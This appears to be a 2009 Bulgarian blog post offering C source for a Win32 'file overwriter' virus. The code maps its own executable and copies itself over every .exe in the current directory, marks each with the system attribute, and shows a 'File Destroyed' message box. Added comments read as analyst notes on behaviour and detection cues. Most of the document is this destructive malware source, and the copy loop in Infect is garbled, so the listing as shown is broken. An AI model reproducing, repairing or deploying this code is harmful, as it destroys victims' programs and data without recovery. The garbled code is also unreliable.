петък, 13 ноември 2009 г.

Win32.PE File Overwriter



Това е прост и як вирус, който презаписва всички .exe файлове в директорията, в която се намира, със свои собствени копия :)

#include windows.h

/*
 * Forward declarations for the four helpers defined below main().
 * Infect() is declared with unsigned char * parameters, while main() passes
 * it the HANDLE variables that OpenFileToInfect()/OpenVirus() fill in; those
 * helpers store the MapViewOfFile() result in the same HANDLE slot.
 */
int FixSize(int BytesToAdd, HANDLE FileHandle);
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize);
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize);
int OpenVirus(char FileName[] , HANDLE *OpenHandle);
/*
 * Entry point of the sample as published on the page.
 *
 * Visible behaviour, in order: resolve the path of the running image, map it
 * read-only (OpenVirus), enumerate "*.exe" relative to the current directory,
 * and for each match call OpenFileToInfect() and Infect(), flush the view,
 * then set FILE_ATTRIBUTE_SYSTEM on the file. A message box is shown when the
 * enumeration ends.
 *
 * Analyst notes:
 *  - The literals "File Destroyed By .ExE Destroyer" and ".ExE Destroyer" are
 *    stack-initialised char arrays, so they are present in the compiled
 *    binary; per the post the overwritten files are copies of that binary,
 *    so the same strings would be expected in damaged files as well
 *    (to be confirmed on a real sample).
 *  - Behavioural pattern visible here: one process reads its own image and
 *    then opens sibling .exe files for writing, followed by SetFileAttributes
 *    with FILE_ATTRIBUTE_SYSTEM on each of them.
 *  - The host file's original bytes are not saved anywhere in the visible
 *    code, so recovery of an overwritten file relies on backups.
 *  - No return value of any API call is checked in this function.
 */
int main()
{
char FileMask[] = "*.exe",FilePath[MAX_PATH],Payload[]="File Destroyed By .ExE Destroyer",Title[] = ".ExE Destroyer";
HANDLE FileFindHandle,NextHandle = 1,FileOpenHandle,VirusHandle;
WIN32_FIND_DATA FindData;
int FileSize,VirusSize;

/* Path of the running executable; it becomes the source of the copied bytes. */
GetModuleFileName(NULL,FilePath,MAX_PATH);
VirusSize = OpenVirus(FilePath,&VirusHandle);

/* The mask has no directory component, so the search is relative to the
   process's current directory. */
FileFindHandle = FindFirstFile(FileMask,&FindData);
FindFiles:
/* NextHandle holds the last FindNextFile() result; 0 ends the loop. */
if(NextHandle == 0) { goto Finish; }
/* Entries whose attribute field equals FILE_ATTRIBUTE_SYSTEM are skipped.
   The same attribute is set below after a file has been processed, so it
   doubles as an "already handled" marker. */
if(FindData.dwFileAttributes == FILE_ATTRIBUTE_SYSTEM) {
FindNextFile:
NextHandle = FindNextFile(FileFindHandle,&FindData);
goto FindFiles;
}

/* After this call FileOpenHandle holds whatever MapViewOfFile() returned
   inside OpenFileToInfect(); FileSize is assigned but not read again. */
FileSize = OpenFileToInfect(FindData.cFileName,&FileOpenHandle,VirusSize);

Infect(FileOpenHandle,VirusHandle,VirusSize);
/* Ask the system to write the modified view back to the file. */
FlushViewOfFile(FileOpenHandle,VirusSize);

/* Attribute change on the processed file; observable via file-system
   auditing as an attribute write on an .exe. */
SetFileAttributes(FindData.cFileName,FILE_ATTRIBUTE_SYSTEM);

goto FindNextFile;

Finish:

/* User-visible artifact: error-icon message box with the two literals above. */
MessageBox(0,Payload,Title,MB_ICONERROR);
return 0;
}

/*
 * Opens FileName for full access and maps it into memory.
 *
 * FileName   - name of the file to open (taken from the directory search).
 * OpenHandle - out parameter, reused three times: it first receives the
 *              CreateFile() handle, then the CreateFileMapping() handle, and
 *              finally the value returned by MapViewOfFile().
 * VirusSize  - size the caller wants available in the file; when it exceeds
 *              the current file size, FixSize() is called with the difference.
 *
 * Returns the size reported by GetFileSize() before any growth.
 *
 * Analyst notes: the open requests GENERIC_ALL with share mode 0 (no
 * sharing), and the mapping asks for PAGE_EXECUTE_READWRITE. Both need write
 * access to the target, so a file the account cannot write to would fail at
 * CreateFile(); the code does not check for that, nor any other return value.
 * None of the intermediate handles is closed in the visible code.
 */
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize) {
int Size;

*OpenHandle = CreateFile(FileName,GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);

/* Grow the file first when it is smaller than the data to be copied in. */
if(VirusSize > Size) { FixSize((VirusSize-Size),*OpenHandle); }
/* The file handle is overwritten by the mapping handle, then by the view
   address; the earlier values are lost to the caller. */
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_EXECUTE_READWRITE,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_ALL_ACCESS,0,0,0);

return Size;
}

/*
 * Opens FileName read-only and maps it into memory.
 *
 * FileName   - path to open; main() passes the running executable's path.
 * OpenHandle - out parameter, reused for the CreateFile() handle, the
 *              CreateFileMapping() handle and finally the MapViewOfFile()
 *              result.
 *
 * Returns the size reported by GetFileSize().
 *
 * Analyst note: a process opening its own image with GENERIC_READ and
 * mapping it PAGE_READONLY is the read side of the self-copy described in
 * the post. No return value is checked and no handle is closed here.
 */
int OpenVirus(char FileName[] , HANDLE *OpenHandle) {
int Size;

*OpenHandle = CreateFile(FileName,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL );

Size = GetFileSize(*OpenHandle,NULL);

*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_READONLY,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_READ,0,0,0);

return Size;
}

/*
 * Byte copy from the source view (VirusHandle) into the target view
 * (FileHandle); always returns 0.
 *
 * NOTE(review): the `for` header below is incomplete as it appears on the
 * page (part of the line was lost when the page was captured), so this
 * listing does not compile as shown. It is kept exactly as published. What
 * remains shows one byte assigned from *VirusHandle to *FileHandle with both
 * pointers advanced afterwards. Writing starts at the address passed in,
 * which main() obtains from a view mapped at file offset 0 -- consistent with
 * the post's description of the target being overwritten rather than
 * extended.
 */
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize) {
int i;
for(i = 0;i*FileHandle = *VirusHandle;
FileHandle++;
VirusHandle++;
}
return 0;
}

/*
 * Appends BytesToAdd bytes to the end of the file behind FileHandle.
 *
 * BytesToAdd - number of bytes to append.
 * FileHandle - open file handle; OpenFileToInfect() passes the CreateFile()
 *              handle before it is replaced by the mapping handle.
 *
 * Always returns 0; the results of SetFilePointer() and WriteFile() and the
 * BytesWritten count are not inspected.
 *
 * Analyst note: Buffer is a variable-length array that is never initialised
 * in the visible code, so the appended bytes are whatever the stack held.
 */
int FixSize(int BytesToAdd,HANDLE FileHandle) {

DWORD BytesWritten = 0;
char Buffer[BytesToAdd];

/* Seek to end-of-file, then write the padding there. */
SetFilePointer(FileHandle,0,0,FILE_END);
WriteFile(FileHandle,Buffer,BytesToAdd,&BytesWritten,NULL);

return 0;
}
